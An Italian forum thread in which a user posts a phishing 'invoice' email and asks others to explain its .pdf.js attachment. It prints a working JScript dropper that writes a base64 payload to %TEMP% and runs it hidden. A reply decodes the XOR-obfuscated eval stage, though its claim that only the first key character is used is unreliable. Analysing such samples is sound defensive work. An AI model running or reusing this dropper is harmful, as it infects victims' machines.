Discussione Strana Email

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
N

Nicholas26

Utente Electrum
5 Novembre 2011
326
22
26
136
Ciao a tutti. Sto cercando urgentemente un programmatore Java che sappia spiegarmi cosa mi sta succedendo.
Ho ricevuto questa email con un allegato zip:

"
Gentile cliente !

in riferimento alla Risoluzione n. 1443 del 25/11/15
Vi inviamo in forma telematica la nostra fattura
Tutte le informazioni memorizzate nella nostra applicazione

Cordiali saluti

Accountancy. "


Da questa email: [email protected]


Che ha un file che non voglio pubblicare qua. Se nel regolamento è previsto che non posso mettere l'email di chi mi ha scritto ditemelo che la rimuovo, ma non cancellate il post perché voglio capire cosa vogliono da me.

Il file contiene un Txt con scritto documento 1443 e un file con lo stesso nome .pdf.js ( non mi faccio fregare ho capito subito che era un js e non un pdf quindi per sicurezza l'ho editato con notepad ++ per vedere il codice )
Lo pubblico qua e spero che qualcuno mi sappia dire cosa fa quel file.

var cGYRqYryEmKt = new ActiveXObject("WScript.Shell");
oCTwkO = cGYRqYryEmKt.ExpandEnvironmentStrings("%TEMP%") + "\\ssd" + Math.round(1e8 * Math.random());
var UzaMiXCfxxZi0 = new ActiveXObject("Msxml2.DOMDocument.6.0");
var ZHQXedXbLbz = new ActiveXObject("ADODB.Stream");
//// KiU13559
//// LkUiAaxe7zZFVgz4
var iweBpSf = UzaMiXCfxxZi0.createElement("tmp");
iweBpSf.dataType = "bin.base64";
//// 6sJqYmhXsl
//// ri7PHQIQvf3eFrJJwV
ZHQXedXbLbz.Type = 1;
//// hrHP0UVjbfbiN496kt
iweBpSf.text = "dmFyIHF0Y1N0T3FmTE8gPSAnNXNyR2pzYnlQQlVPUUp5MjdjQic7dmFyIHlqcldMID0gJ0NceDI3XHgxZi07IFx4MGZceDBmaGJob3NceDAzLVx4MDBceDAyUnNceDE3SFx4N2ZNZ3lceDA0XHgwYz4hISY+JFlEY1x4MGUoZCBceDFmMV9bXHgxNC09KFx4MDRceDFjPDxPXHgxYlx4MTdceDE4Tz9ceDVjXWhFU1dIZ1x4MDhceDFlIyBceDFiXHgxM0pceDA1LDFiXHgwMjhKYFx4NWNNVlx4N2ZiOjYzXHgxM1x4MWNnUFx4MGIpOHlSZ0pTXHgxMFx4MWMkN1x4MjchcSRceDFjRVx4MTciIUFceDFhXHgwNCIyPFx4MDBceDEzNSEhZ1x4MjdceDFlXHgxNFhmMC9DRVtKYFx4MGVZdFpPXykkJFx4MWFGXlx4MGMsXHgxNVx4MDUmKlx4MDAiMVx4MTQmalx4MGZceDAxPlx4MDVceDAza1x4N2Y1a1x4MTVceDA4XHg3Zk1KU0JZJiNceDI3b1x4MjdceDFlXHgxNFhmMC9DR1J6SlRceDAzXHgwNX5zXHgwOTdgeyVKXHgwNlAkRV5IXHgxYlx4MTJCXHgwNyUoc2AvXHgwZDJIXHgwNVx4MTZYXHgxZU1DXHgxM1x4MTBVUEFaXHgxMlx4MGNceDA5N2BceDdmI25PU3ZpXHgwYkN1XHgxZVx4MThMRFx4MGM6ZX1ceDBkMklTV1x4MGFzby9ceDBhd14vXHgxYUhlOnZscjZceDEzXHgwNFx4MDI/Olx4MDVKLj9bS1x4MDJceDBjeXpceDA5N2EvJUpceDA2VDZpXHgwYkNwR1U+XHgwMWByXHgwMnByaVpSVFF3aVx4MGJCJTZceDBiU1x4MWIrPFx4MTl4XHgwZDJJXHgwYWtceDFic1x4MDJLQWRJUFx4MTZceDA0XHgwYzpneGtceDE2XHgwMVx4MDNSPzpceDA0XHgxMVx4MDgqNlx4MGJQTmhceDFlLVx4N2ZjXHgxNlx4MDFceDAzUVx4MDJceDFlTUJFZlEvXHgxYUkxXHgxNWpscmlceDAxSlx4MGRaXHgxZU1CRlx4MWJceDEyQ1x4MDMlKHM3OWF5M2JceDE0QGFJXHgxOURyNlx4MGJSQFx4MGM6ZHcxP1BceDBha1x4MWJyUC9ceDBhdl1ceDA3Plx4MDFhdXhpXHgwZDJJXHgwMmBceDVjZVx4MWJceDAwXHgwMitceDAzXHgwN0pbc2F2bXhxdDhceDE4TG1ceDFhUyU3XHgxZFx4MTUmXHgxMjk0JClceDE5XHgyN1x4MWV+OmltXHgxYVx4NWNdZ1x4MDg3OzZceDFmNCE8K0dzXHgxMlx4MTdDYlx4NWNceDE1Um8wPVx4MGQ2Klx4MWJceDFkXHgxOXF3RFx4MTJceDE1QWtceDE1XHgwOFx4N2ZNRVx4NWNNVnA0IFx4MjdlIUxRfjdceDI3OHldaEVceDVjQjJceDE3XHgxOFx4MDF+XHgxN1x4MTA7Zl5ceDA5c1d+eGdKU0JZcGJ1I1x4MDE8MUN8XHgwNTFAU09nSF1AWXtidytzalJceDEyXHgxNVx4MGZgXHgxNVhSZVx4MDZRWXRaYnVvcTdZV1tceDEwXHgyN1x4MTVceDA4XHg3Zk1KU0JZcGJ1bz1ceDFhXHgwZnpGKCRGXHgwNlJ6SlFMW3BpdW0haFlceDE5XHgxN0EmXHgxN1NZZ0hceDE1QEJdSHVvcWpceDA0XHgwOTppYlx4MTVTUiFceDA1XHgwMUJRJiNceDI3b1x4MDU9XHgwM1V2O1x4MDRnXHgyN1x4MWE/K1NfWWB5dVx4MWImMFx4MWVzbyVceDEwYVx4MWJceDBhXHgwNkpPQlx4MGZceDA0Lz9ceDFlXHgwMlx4MjdceDBmXHgwNlx4MTlceDBmXHgyN1tceDE0XHgwNi9RUzZceDBlKiVceDE0XHgxN1x4MTdceDE4LVpPImlceDFlWlI8Z3lCWXBidW9xalx4MGZTRUMxRFx4MDMjXHgxMjMrXHgxOFx4MWQ1OzxceDAyXHgxOTBZXHgwZlx4MTdceDE1XHgxNlhceDE5I1x4MTRceDA3XHgwNVdRclx4MTVceDA2LCMjXHgwOUZceDE5MCpQXHgxZlx4MWVlQ0hvc1x4N2ZtemBxfEBhYlQtfSJceDAycjpceDE4OnRabXpgfmpIe1MkNmVceDEyXHgxYVx4MTJYXHgxNCVceDAxMTdYRXFqWVx4MTJceDE3Q2JceDE1Klx4MTNceDExKTEmXHgwZiU4dXJxOVx4MDhCZjZceDFibVx4MDlceDE2Ilx4MTNceDFhLzEqbFx4MTA3IStceDE3VnJceDBkNFx4NWNceDAxXHgxZClceDA3XHgxNlx4MGNceDBkXHgwMzZceDI3Jj8tXHgwYVx4MWFceDE1Rlx4MTZwPiJiSFpCUnBgXHgwOVx4MTNzalJceDEyelx4MDI2XV1ceDAwKFx4MWZceDFkXHgwNlFhXHgyN21ve2o0U0NceDBibEdceDEyXHgxYyNceDA1XHgxZUpQeWJ+bz1ceDFhXHgwZnpGKCRGXHgwNklKYFNCWXBidW9xXHgxY1x4MWV5bzopXHgxNU5SIVx4MGJceDFmXHgxMVx4MWNrT19vcWpZXHgxMlx4MTdDYkNceDI3XHgxZi07IFx4MGZceDBmYGJob1x4MjdceDFlXHgxNFhmMC9DRlplXHgyNyA6NFx4MWNwe1x4MTdceDFjXHgwNjFmYzNgXHgxY0hceDdmTUVceDVjTVZwXHgwZC9ceDI3XHgxNVx4MDQuZjppbVx4MWFceDVjXWdceDBmQVx4MDlINndceDI3N1x4NWNAWVx4MTJceDE3Q2JceDE1U1IxPlx4MWVceDA4KFx4MDMvI1x4N2ZceDdmJVx4MTdAUlx4MDImTFx4MDBceDA2Jlx4MWVceDE2XHgwMVx4MTExLDIqcXdZVEJceDBkIUFceDFhXHgxZClCWkJceDAyXUh1b3FqWVx4MTJceDE3Q2JceDE1U1IuXHgwY1NKTXBceDdmaG9ceDI3XHgxZVx4MTRYZjAvQ0NceDVjNVx4MGZceDEyXHgwNlx4MDBceDAzNjQ7NGpfXHgxNFx4MTdRclx4MDVTT3pKXHgwNTZceDE0Olx4MTNceDA2Ilx4Mjd6V0FDXHgwMjZAXHgwMFtnXHgxMX5oWXBidW9xallceDEyXHgxN0NiXHgxNVNSZ1x4MWNceDEyXHgxMFkmXHgxNjglXHgwMFx4MTlceDE0RFx4MDZDXHg3Zlx4MTVceDA1JipceDAwIjFceDE0Jnd9bVx4MTBceDBlNnZ1TVx4MTFBXHgwMVx4MTcmXHgwN1FLQl1IdW9xallceDEyXHgxN0NiXHgxNVNSZ0pTQlx4MTA2Yn05XHgwNVx4MjdceDEzY2RceDBlNFx4MDRdXHgxZDdceDBmXHgxZEpQfGIjXHgxYjwgKGFaXHgxNXNceDFiXHgwN1x4MGI3XHgwZlNfWWFudTlceDA1XHgyN1x4MTNjZFx4MGU0XHgwNF1ceDA1NVx4MDNceDA3XHgwN1EmXHgxNjglXHgwMFx4MTlceDE0RFx4MDdNXHgxMFBceDAwXHgwMihceDA0XHgwMFx4MDc7PyYsZn1qTFdceDA0Q35ceDE1XHgwNSYqXHgwMCIxXHgxNCZzezw4MFx4MWNceDFiXHgxN1x4MThPP1NSZ0pTQllwYnVvcWpZXHgxMlx4MTdDYlx4MTVTJCAhKztceDEycFx4N2Z1OyM/XHgxY1x4MDk6aWJceDE1U1JnSlNCWXBidW9xallceDEyXHgxN0NiQ1x4MjdceDFmLTsgXHgwZlx4MGZhbCUgIiNceDBkW1hceDBkYlx4MDhTQnxneUJZcGJ1b3FqWVx4MTJceDE3Q2JceDE1U1JnSlNCXHgwZlx4MDQvP1x4MWVceDAyXHgyN1x4MGZceDAzXHgxOVx4MTAjQ1x4MTYmKCxceDFhXHgwZVx4MWN4XHgxYjRceDE5XHgxMlx4MDg9REJceDE5blx4MTVBW3xneUJZcGJ1b3FqWVx4MTJceDE3Q2JceDE1U1JnSlNCXHgwZCI7dTRceDVjQHA7PmpLXHgxNVNSZ1x4MDNceDE1QlFceDBhXHgwYzpceDAwK1x4MTMxZFx4MTdeXHg3Zlx4MTVRUG5KXHgwOG9zWUtceDVjRlhDcEFGXHgxM1x4MTNgKio9XHgwZVx4MTZceDFiXHgxMFx4MWRceDBhL2FceDE0Mlx4MWNRXHgxZkEwQFx4MWRceDE2K1x4MDZAUFlyYn5vXHgwOCsvcXVceDI3NEBceDA5UmxKUU5ZcmJ+b3NceDBlXHgxNV5lXHgwNiVceDVjXHgwMFx4MDYiXHgxOCBceDA3XHgwYiZceDI3XHgyN214cXQ4XHgxOExtXHgxYVNceDA3XHgwYlx4MWRceDAzVVx4MWZnI2EmXHgwOFx4MTJNVE4wKWM8XHg3Zk1FXHg1Y01WcFx4MDNceDFkK2F7XHgxNnlkXHgwYy84eXtOY3prWXBidTJxL1x4MTVBUkM5OHl7TmN6a1lwYnVvcWpZQUZceDEzXHgxM2AqKj1ceDBlXHgxNlx4MWJceDEwXHgxZFx4MGEvYVx4MDM/XHgxN1x4MWFuXHgwMlx4MTR2MTYxXHgxZlx4MDlOWWFudVx4N2Z4cXQ4PmpLPHpSZ0pTXHgxZkJdSHVvcWpZXHgxMlx4MTdDYlx4MTVTUmdKU0JZcGJ1MnEpXHgxOEZUXHgwYmJceDFkXHgwNSYqXHgwMCIxXHgxNCZwfG8qR3NceDEyXHgxN0NiXHgxNVNSZ0pTQllwYnVvcWpZXHgxMlx4MTdDYlx4MTV+eGdKU0JZcGJ1b3FqWVx4MTJceDE3Q2JceDE1U1JnXHgxN0hvc3BidW9xallceDEyXHgxN0NiXHgxNVNSZ0pceDBlb3NwYnVvcWpZXHgxMlx4MTdDYlx4MTVTUmdKXHgwNTZceDE0Olx4MTNceDA2Ilx4Mjd7V1FbXHgwYzFQW1tKYFNCWXBidW9xallceDEyXHgxN1x4MWVPP1NSZ0pTQllwP25CW2pZXHgxMlx4MTdDYlx4MTVTXHgwNjVceDEzU1x4MTl0WmJ1b3FqWVx4MTJceDE3Q2JceDE1U1x4MDQmXHgxOFNceDEzXHgwZDNceDExIVx4MDAgLDV9XHgxN15iXHgxMkZLJVx4MWU0OF5rT19vcWpZXHgxMlx4MTdDYlx4MTVTUmdceDFjXHgxMlx4MTBZKShceDI3XHgxOFx4MWRqRFx4MTJBNy9fIiEqXHgxY0c5LVx4Mjc4Mlx4MGVceDA5XHgwYytmX1x4MWJceDAzaEhceDdmTUVceDVjTVZwXHgwMVx4MWF8XHgxYiBOVnhceDA4XHgxYnEmXHgxZFx4MGRceDI3SitceDFjXHgxMXVYRX5lVlx4MWRceDE3LDhhXHgwNFx4MThceDAxXytXXHgxNFx4MWU1XHgwZlx4MGRceDEwXHgxMlx4MTVhOmliXHgxNVNSZ0pTQllwYnUpPjhZXHgxYUFceDAyMFx4MTVceDA1Ij0+XHgxY1x4MDQhOjQ8KjpqRFx4MTJceDE1QW5ceDE1JTlceDE3OjRceDEwNVx4MDFceDI3Ji5nakRceDEyXHgwN09iYzgiXHgxNy1ceDAxLig1MTR4cXdZXHgwMlx4MGNDXHgxNH4jIlx4MDBceDE4PzNceDFjIyNjb21qXHgwMFhFNFx4MGVceDFiXHgxZlx4MTcpXHgwZFx4MDdceDBhQnBceDE0XHgxZVx4MWZceDAxXHgwZFx4MGJ+Zlx4MDYxVEVZbENTXHgxNCkqXHgxNjopXHgwOSBceDBmW1JceDA4Ylx4MWVOUlx4MTRceDFlXHgwMVx4MGJceDE3N2wzPT5ceDI3OlpWXHgxMVx4MDFaXHgxN1x4MTdvXHgxM1x4MTlceDEwLlx4MWNsNlx4MjcwODpdU1x4MDZceDAzQVskXHgwYzojJVx4MGJceDFjXHgxMzA8MHxQXHgxMmlDM0FceDEwITMlXHgwMlx4MDQ1XHgxZmw2XHgyNzA4Ol1TXHgwNlx4MDNBWyRceDBjOiMlXHgwYlx4MWNceDEzMDwwfVBceDFiXHgxYkNceDE0fiMiXHgwMFx4MTg/M1x4MWMjI2JkemZZZHwzXHgxMnJceDAxPlx4MTZceDBmXHgwMFx4MDNOcFx4N2ZobyA+XHgxYWFDLDNTPz1pXHgwNlx4MTZceDBjXHgxZSQqdWl3alFkfDNceDEyclx4MDE+XHgxNlx4MGZceDAwXHgwM05wXHg3ZnVceDdmeHF0OFx4MTdDYlx4MTVTUmdKU0JZcDRceDAxIjtceDFiKl9BVGJceDA4U1AvXHgxZVx4MDdceDEyQ1x4N2Ztd296alx4MGZiTTctUytceDE4MVx4MDNceDE2XHgwOVl7YndgIy9ceDFkW0VBYlx4MWVTUGlIU0lZcjJ3b3pqW1pceDE1Q2lceDE1UVx4MDJlUX5oWXBidW9xallceDEyXHgxN0NiQ1x4MjdceDFmLTsgXHgwZlx4MGZgbDo/NCRRXHgxMGcsXHgxMWFRXmdceDFjXHgyN1x4MGZceDEzXHgwMVx4MTE4OWZmWVRWXHgwZjFQWklKYFNCWXBidW9xallceDEyXHgxN1x4MTVceDE2WFx4MTkjXHgxNFx4MDdceDA1UlcjXHgyNyFceDFkNDtceDBjV0RceDE3XHgwYVBceDEyXHgxNiJceDE4W0A6PywhKj8+VGZOXHgxM1x4MjdceDE3X1JlXHgwYlx4MDNceDEyXHgxNTkhNDs4JVx4MTdceDFkT041Qlx4MDRfIVx4MDVceDAxXHgwZlQlMDkqPylceDE2VlJceDA3YFx4MWNIXHg3Zk1KU0JZcGJ1b3FqWVx4MTJBNy9fIiEqXHgxY0NMXHgwYTUsMWdzIVx4MTNlVTs1ZylceDI3XHgwZj5ceDA3LFx4MWZtYHVkcVx4MDdceDE4Rl9NMFRceDFkXHgxNihceDA3W0tZe2J3aTskXHgxZFhceDBhQWJceDFlU1x4MDRceDEzXHgwN1x4MTkzKj00bW96aiN8WCw4bDskblF+aFlwYnVvcWpZT1x4MTdceDAwI0FceDEwXHgxYWdCXHgwNTZceDE0Olx4MTNceDA2Ilx4Mjd5UFx4MTJMbkg4eVJnSlNCWXBiKHRceDVjQHQ4XHgxOExtXHgxYVNceDBhXHgxMVx4MTAwJVx4MTBceDA3XHgwN1x4MDQ9ZiFceDBhR15ceDE2Tz9ceDVjXWhFUzhceDFkJTZhejAgXHgxM3E6aWJceDE1U1JnSlNCXHgxMDZifVx4MTk2XHgwMSFrXHg1Y0piTn54Z0pTQllwYnVvcWpZUEVceDA2I15IXHg3Zk1KU0JZcGJ1byxxdDhceDE4TG1ceDFhU1x4MDJyXHgwZjdQXHgwMFx4MDA0bCZceDE4R3NceDFkXHgxOExtXHgxNVx4MTZceDAzcFx4MTJceDE0XHgxYTVceDA0XHgwNVx4MWRCW2pZXHgxMlx4MTdceDFleTh5XHgwZnxneW9zJlx4MTY4JVx4MDBceDE5XHgxNERceDFmQWBceDFjSFx4N2ZNXHgxY1x4MjdceDBmXHgxM1x4MDFceDExODl5aF9ceDVjVFx4MGVceDdmVjEkXHgwMyggOlt5eSc7Zm9yICh2YXIgdlB6VG9mWGp2aWVrID0gIiIsIFZLUFBHckxRZXNhNiA9IDAsIFZLUFBHckxRZXNhNyA9IDA7IFZLUFBHckxRZXNhNiA8IHlqcldMLmxlbmd0aDsgVktQUEdyTFFlc2E2KyspIHZQelRvZlhqdmllayArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKHlqcldMLmNoYXJDb2RlQXQoVktQUEdyTFFlc2E2KSBeIHF0Y1N0T3FmTE8uY2hhckNvZGVBdChWS1BQR3JMUWVzYTcpKSwgVktQUEdyTFFlc2E3KyssIFZLUFBHckxRZXNhNyA9PSBxdGNTdE9xZkxPLmxlbmd0aCAmJiAoVktQUEdyTFFlc2E3ID0gMCk7ZnVuY3Rpb24gSUtUaENTKCkgeyByZXR1cm4gJ2UnOyB9OyBmdW5jdGlvbiBTUXVsVmsoKSB7IHJldHVybiAndmFsJzsgfTsgdGhpc1tJS1RoQ1MoKSArIFNRdWxWaygpXSh2UHpUb2ZYanZpZWspOw==";
ZHQXedXbLbz.Open();
//// 45SXlth
//// rW2egl
ZHQXedXbLbz.Write(iweBpSf.nodeTypedValue);
oCTwkO = oCTwkO + ".js";
ZHQXedXbLbz.SaveToFile(oCTwkO, 2);
ZHQXedXbLbz.Close();
//// jsAEiSHdZq5wnHsVUN
//// 4d8iJ8xEDe9u7
cGYRqYryEmKt.Run(oCTwkO, 0, 0);
 
Ultima modifica:
Java e JavaScript sono due linguaggi del tutto diversi. Condividono la stessa radice nel nome, ma non hanno proprio niente in comune.
Ad ogni modo, quel codice è un malware:
quella lunga stringa che vedi non è altro che la codifica Base64 del seguente codice:
Codice: 
var qtcStOqfLO = '5srGjsbyPBUOQJy27cB';
var yjrWL = 'C\x27\x1f-; \x0f\x0fhbhos\x03-\x00\x02Rs\x17H\x7fMgy\x04\x0c>!!&>$YDc\x0e(d \x1f1_[\x14-=(\x04\x1c<<O\x1b\x17\x18O?\x5c]hESWHg\x08\x1e# \x1b\x13J\x05,1b\x028J`\x5cMV\x7fb:63\x13\x1cgP\x0b)8yRgJS\x10\x1c$7\x27!q$\x1cE\x17"!A\x1a\x04"2<\x00\x135!!g\x27\x1e\x14Xf0/CE[J`\x0eYtZO_)$$\x1aF^\x0c,\x15\x05&*\x00"1\x14&j\x0f\x01>\x05\x03k\x7f5k\x15\x08\x7fMJSBY&#\x27o\x27\x1e\x14Xf0/CGRzJT\x03\x05~s\x097`{%J\x06P$E^H\x1b\x12B\x07%(s`/\x0d2H\x05\x16X\x1eMC\x13\x10UPAZ\x12\x0c\x097`\x7f#nOSvi\x0bCu\x1e\x18LD\x0c:e}\x0d2ISW\x0aso/\x0aw^/\x1aHe:vlr6\x13\x04\x02?:\x05J.?[K\x02\x0cyz\x097a/%J\x06T6i\x0bCpGU>\x01`r\x02priZRTQwi\x0bB%6\x0bS\x1b+<\x19x\x0d2I\x0ak\x1bs\x02KAdIP\x16\x04\x0c:gxk\x16\x01\x03R?:\x04\x11\x08*6\x0bPNh\x1e-\x7fc\x16\x01\x03Q\x02\x1eMBEfQ/\x1aI1\x15jlri\x01J\x0dZ\x1eMBF\x1b\x12C\x03%(s79ay3b\x14@aI\x19Dr6\x0bR@\x0c:dw1?P\x0ak\x1brP/\x0av]\x07>\x01auxi\x0d2I\x02`\x5ce\x1b\x00\x02+\x03\x07J[savmxqt8\x18Lm\x1aS%7\x1d\x15&\x1294$)\x19\x27\x1e~:im\x1a\x5c]g\x087;6\x1f4!<+Gs\x12\x17Cb\x5c\x15Ro0=\x0d6*\x1b\x1d\x19qwD\x12\x15Ak\x15\x08\x7fME\x5cMVp4 \x27e!LQ~7\x278y]hE\x5cB2\x17\x18\x01~\x17\x10;f^\x09sW~xgJSBYpbu#\x01<1C|\x051@SOgH]@Y{bw+sjR\x12\x15\x0f`\x15XRe\x06QYtZbuoq7YW[\x10\x27\x15\x08\x7fMJSBYpbuo=\x1a\x0fzF($F\x06RzJQL[pium!hY\x19\x17A&\x17SYgH\x15@B]Huoqj\x04\x09:ib\x15SR!\x05\x01BQ&#\x27o\x05=\x03Uv;\x04g\x27\x1a?+S_Y`yu\x1b&0\x1eso%\x10a\x1b\x0a\x06JOB\x0f\x04/?\x1e\x02\x27\x0f\x06\x19\x0f\x27[\x14\x06/QS6\x0e*%\x14\x17\x17\x18-ZO"i\x1eZR<gyBYpbuoqj\x0fSEC1D\x03#\x123+\x18\x1d5;<\x02\x190Y\x0f\x17\x15\x16X\x19#\x14\x07\x05WQr\x15\x06,##\x09F\x190*P\x1f\x1eeCHos\x7fmz`q|@abT-}"\x02r:\x18:tZmz`~jH{S$6e\x12\x1a\x12X\x14%\x0117XEqjY\x12\x17Cb\x15*\x13\x11)1&\x0f%8urq9\x08Bf6\x1bm\x09\x16"\x13\x1a/1*l\x107!+\x17Vr\x0d4\x5c\x01\x1d)\x07\x16\x0c\x0d\x036\x27&?-\x0a\x1a\x15F\x16p>"bHZBRp`\x09\x13sjR\x12z\x026]]\x00(\x1f\x1d\x06Qa\x27mo{j4SC\x0blG\x12\x1c#\x05\x1eJPyb~o=\x1a\x0fzF($F\x06IJ`SBYpbuoq\x1c\x1eyo:)\x15NR!\x0b\x1f\x11\x1ckO_oqjY\x12\x17CbC\x27\x1f-; \x0f\x0f`bho\x27\x1e\x14Xf0/CFZe\x27 :4\x1cp{\x17\x1c\x061fc3`\x1cH\x7fME\x5cMVp\x0d/\x27\x15\x04.f:im\x1a\x5c]g\x0fA\x09H6w\x277\x5c@Y\x12\x17Cb\x15SR1>\x1e\x08(\x03/#\x7f\x7f%\x17@R\x02&L\x00\x06&\x1e\x16\x01\x111,2*qwYTB\x0d!A\x1a\x1d)BZB\x02]HuoqjY\x12\x17Cb\x15SR.\x0cSJMp\x7fho\x27\x1e\x14Xf0/CC\x5c5\x0f\x12\x06\x00\x0364;4j_\x14\x17Qr\x05SOzJ\x056\x14:\x13\x06"\x27zWAC\x026@\x00[g\x11~hYpbuoqjY\x12\x17Cb\x15SRg\x1c\x12\x10Y&\x168%\x00\x19\x14D\x06C\x7f\x15\x05&*\x00"1\x14&w}m\x10\x0e6vuM\x11A\x01\x17&\x07QKB]HuoqjY\x12\x17Cb\x15SRgJSB\x106b}9\x05\x27\x13cd\x0e4\x04]\x1d7\x0f\x1dJP|b#\x1b< (aZ\x15s\x1b\x07\x0b7\x0fS_Yanu9\x05\x27\x13cd\x0e4\x04]\x055\x03\x07\x07Q&\x168%\x00\x19\x14D\x07M\x10P\x00\x02(\x04\x00\x07;?&,f}jLW\x04C~\x15\x05&*\x00"1\x14&s{<80\x1c\x1b\x17\x18O?SRgJSBYpbuoqjY\x12\x17Cb\x15S$ !+;\x12p\x7fu;#?\x1c\x09:ib\x15SRgJSBYpbuoqjY\x12\x17CbC\x27\x1f-; \x0f\x0fal% "#\x0d[X\x0db\x08SB|gyBYpbuoqjY\x12\x17Cb\x15SRgJSB\x0f\x04/?\x1e\x02\x27\x0f\x03\x19\x10#C\x16&(,\x1a\x0e\x1cx\x1b4\x19\x12\x08=DB\x19n\x15A[|gyBYpbuoqjY\x12\x17Cb\x15SRgJSB\x0d";u4\x5c@p;>jK\x15SRg\x03\x15BQ\x0a\x0c:\x00+\x131d\x17^\x7f\x15QPnJ\x08osYK\x5cFXCpAF\x13\x13`**=\x0e\x16\x1b\x10\x1d\x0a/a\x142\x1cQ\x1fA0@\x1d\x16+\x06@PYrb~o\x08+/qu\x274@\x09RlJQNYrb~os\x0e\x15^e\x06%\x5c\x00\x06"\x18 \x07\x0b&\x27\x27mxqt8\x18Lm\x1aS\x07\x0b\x1d\x03U\x1fg#a&\x08\x12MTN0)c<\x7fME\x5cMVp\x03\x1d+a{\x16yd\x0c/8y{NczkYpbu2q/\x15ARC98y{NczkYpbuoqjYAF\x13\x13`**=\x0e\x16\x1b\x10\x1d\x0a/a\x03?\x17\x1an\x02\x14v161\x1f\x09NYanu\x7fxqt8>jK<zRgJS\x1fB]HuoqjY\x12\x17Cb\x15SRgJSBYpbu2q)\x18FT\x0bb\x1d\x05&*\x00"1\x14&p|o*Gs\x12\x17Cb\x15SRgJSBYpbuoqjY\x12\x17Cb\x15~xgJSBYpbuoqjY\x12\x17Cb\x15SRg\x17HospbuoqjY\x12\x17Cb\x15SRgJ\x0eospbuoqjY\x12\x17Cb\x15SRgJ\x056\x14:\x13\x06"\x27{WQ[\x0c1P[[J`SBYpbuoqjY\x12\x17\x1eO?SRgJSBYp?nB[jY\x12\x17Cb\x15S\x065\x13S\x19tZbuoqjY\x12\x17Cb\x15S\x04&\x18S\x13\x0d3\x11!\x00 ,5}\x17^b\x12FK%\x1e48^kO_oqjY\x12\x17Cb\x15SRg\x1c\x12\x10Y)(\x27\x18\x1djD\x12A7/_"!*\x1cG9-\x2782\x0e\x09\x0c+f_\x1b\x03hH\x7fME\x5cMVp\x01\x1a|\x1b NVx\x08\x1bq&\x1d\x0d\x27J+\x1c\x11uXE~eV\x1d\x17,8a\x04\x18\x01_+W\x14\x1e5\x0f\x0d\x10\x12\x15a:ib\x15SRgJSBYpbu)>8Y\x1aA\x020\x15\x05"=>\x1c\x04!:4<*:jD\x12\x15An\x15%9\x17:4\x105\x01\x27&.gjD\x12\x07Obc8"\x17-\x01.(514xqwY\x02\x0cC\x14~#"\x00\x18?3\x1c##comj\x00XE4\x0e\x1b\x1f\x17)\x0d\x07\x0aBp\x14\x1e\x1f\x01\x0d\x0b~f\x061TEYlCS\x14)*\x16:)\x09 \x0f[R\x08b\x1eNR\x14\x1e\x01\x0b\x177l3=>\x27:ZV\x11\x01Z\x17\x17o\x13\x19\x10.\x1cl6\x2708:]S\x06\x03A[$\x0c:#%\x0b\x1c\x130<0|P\x12iC3A\x10!3%\x02\x045\x1fl6\x2708:]S\x06\x03A[$\x0c:#%\x0b\x1c\x130<0}P\x1b\x1bC\x14~#"\x00\x18?3\x1c##bdzfYd|3\x12r\x01>\x16\x0f\x00\x03Np\x7fho >\x1aaC,3S?=i\x06\x16\x0c\x1e$*uiwjQd|3\x12r\x01>\x16\x0f\x00\x03Np\x7fu\x7fxqt8\x17Cb\x15SRgJSBYp4\x01";\x1b*_ATb\x08SP/\x1e\x07\x12C\x7fmwozj\x0fbM7-S+\x181\x03\x16\x09Y{bw`#/\x1d[EAb\x1eSPiHSIYr2wozj[Z\x15Ci\x15Q\x02eQ~hYpbuoqjY\x12\x17CbC\x27\x1f-; \x0f\x0f`l:?4$Q\x10g,\x11aQ^g\x1c\x27\x0f\x13\x01\x1189ffYTV\x0f1PZIJ`SBYpbuoqjY\x12\x17\x15\x16X\x19#\x14\x07\x05RW#\x27!\x1d4;\x0cWD\x17\x0aP\x12\x16"\x18[@:?,!*?>TfN\x13\x27\x17_Re\x0b\x03\x12\x159!4;8%\x17\x1dON5B\x04_!\x05\x01\x0fT%09*?)\x16VR\x07`\x1cH\x7fMJSBYpbuoqjY\x12A7/_"!*\x1cCL\x0a5,1gs!\x13eU;5g)\x27\x0f>\x07,\x1fm`udq\x07\x18F_M0T\x1d\x16(\x07[KY{bwi;$\x1dX\x0aAb\x1eS\x04\x13\x07\x193*=4mozj#|X,8l;$nQ~hYpbuoqjYO\x17\x00#A\x10\x1agB\x056\x14:\x13\x06"\x27yP\x12LnH8yRgJSBYpb(t\x5c@t8\x18Lm\x1aS\x0a\x11\x100%\x10\x07\x07\x04=f!\x0aG^\x16O?\x5c]hES8\x1d%6az0 \x13q:ib\x15SRgJSB\x106b}\x196\x01!k\x5cJbN~xgJSBYpbuoqjYPE\x06#^H\x7fMJSBYpbuo,qt8\x18Lm\x1aS\x02r\x0f7P\x00\x004l&\x18Gs\x1d\x18Lm\x15\x16\x03p\x12\x14\x1a5\x04\x05\x1dB[jY\x12\x17\x1ey8y\x0f|gyos&\x168%\x00\x19\x14D\x1fA`\x1cH\x7fM\x1c\x27\x0f\x13\x01\x1189yh_\x5cT\x0e\x7fV1$\x03( :[yy';

for (var vPzTofXjviek = "", VKPPGrLQesa6 = 0, VKPPGrLQesa7 = 0; VKPPGrLQesa6 < yjrWL.length; VKPPGrLQesa6++)
vPzTofXjviek += String.fromCharCode(yjrWL.charCodeAt(VKPPGrLQesa6) ^ qtcStOqfLO.charCodeAt(VKPPGrLQesa7)), VKPPGrLQesa7++, VKPPGrLQesa7 == qtcStOqfLO.length && (VKPPGrLQesa7 = 0);

function IKThCS() { return 'e'; };
function SQulVk() { return 'val'; };
this[IKThCS() + SQulVk()](vPzTofXjviek);
Quest'altro codice contiene un altra stringa lunghissima e un ciclo for. Viene salvato in un file all'interno della directory TEMP e poi eseguito.
In fondo si trova la definizione di due funzioni, che non fanno altro che ritornare (insieme) la stringa "eval". Questa stringa è il nome della funzione che viene richiamata dopo. Quindi le ultime tre istruzioni corrispondono a:
Codice: 
eval(stringa-lunga);
che non fa altro che eseguire il codice dentro le parentesi.
Quella stringa lunga non viene però passata alla funzione eval così come la trovi scritta: il ciclo for soprastante non fa altro che effettuare lo XOR bitwise tra la stringa lunga e il primo carattere di quella piccola stringa che trovi in cima (ossia '5') [mi pare prenda solo e sempre il primo carattere: non itera per i successivi - ma a quest'ora sono anche assai stanco quindi non si sa mai]. Il risultato viene eseguito.

